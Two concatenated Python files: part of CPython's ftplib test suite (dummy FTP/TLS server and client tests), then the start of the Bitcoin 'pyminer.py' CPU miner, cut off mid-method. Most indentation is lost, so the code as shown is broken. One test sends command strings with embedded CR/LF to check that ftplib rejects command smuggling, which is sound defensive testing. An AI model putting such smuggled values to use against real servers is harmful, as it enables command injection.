if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
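            # the 227 reply carries the port as two bytes; clients rebuild it as p1 * 256 + p2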
            ip = ip.replace('.', ','); p1 = port // 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r0')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError,
EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
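        # For example, a server whose directory is  /foo/b"ar  must send it as
        # 257 "/foo/b""ar" on the wire; parse257() is expected to collapse the
        # doubled quote back to a single one, as the assertions below verify.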
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv23
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = True
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
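# Note: applying bufreverse() and then wordreverse() to the 32-byte SHA-256
# digest is equivalent to reversing all of its bytes; Miner.work() below uses
# that to turn the candidate hash into big-endian hex before comparing it
# against the target.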
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
        # the first 76 bytes of the 80-byte block header do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
